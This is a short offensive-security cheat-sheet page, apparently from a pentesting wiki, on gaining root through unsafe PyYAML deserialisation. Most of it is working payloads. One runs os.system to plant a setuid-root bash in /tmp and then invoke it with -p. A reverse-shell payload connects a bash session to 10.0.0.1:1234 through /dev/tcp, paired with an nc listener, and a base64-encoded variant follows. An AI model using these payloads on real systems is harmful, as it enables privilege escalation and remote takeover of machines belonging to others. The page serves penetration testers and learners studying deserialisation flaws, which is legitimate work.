Python Yaml Privilege Escalation

Python Yaml package is vulnerable to execute arbitrary command.

Investigation

import yaml

filename = "example.yml"
yaml.load()
Copied!

Payloads

import yaml
from yaml import Loader, UnsafeLoader

data = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'
yaml.load(data)
yaml.load(data, Loader=Loader)
yaml.load(data, Loader=UnsafeLoader)
yaml.load_all(data)
yaml.load_all(data, Loader=Loader)
yaml.load_all(data, Loader=UnsafeLoader)
yaml.unsafe_load(data)
Copied!

Now execute the bash in privilege mode.

/tmp/bash -p
Copied!

Reverse Shell

Start a listener in local machine.

nc -lvnp 1234
Copied!

Then execute Python script that contains the following YAML code as root.

import yaml
yaml.load('!!python/object/new:os.system ['bash -c "bash -i >& /dev/tcp/10.0.0.1/1234 0>&1"'])
Copied!

Base64 Encoding

Sometimes we might be able to remote code execution by using Base64 encoded payload.

yaml.load(b64decode(b"ISFweXRa...YXNoIl0="))
Copied!

References

https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation

PreviousPython Privilege Escalation NextRuby Privilege Escalation

Last updated 2 years ago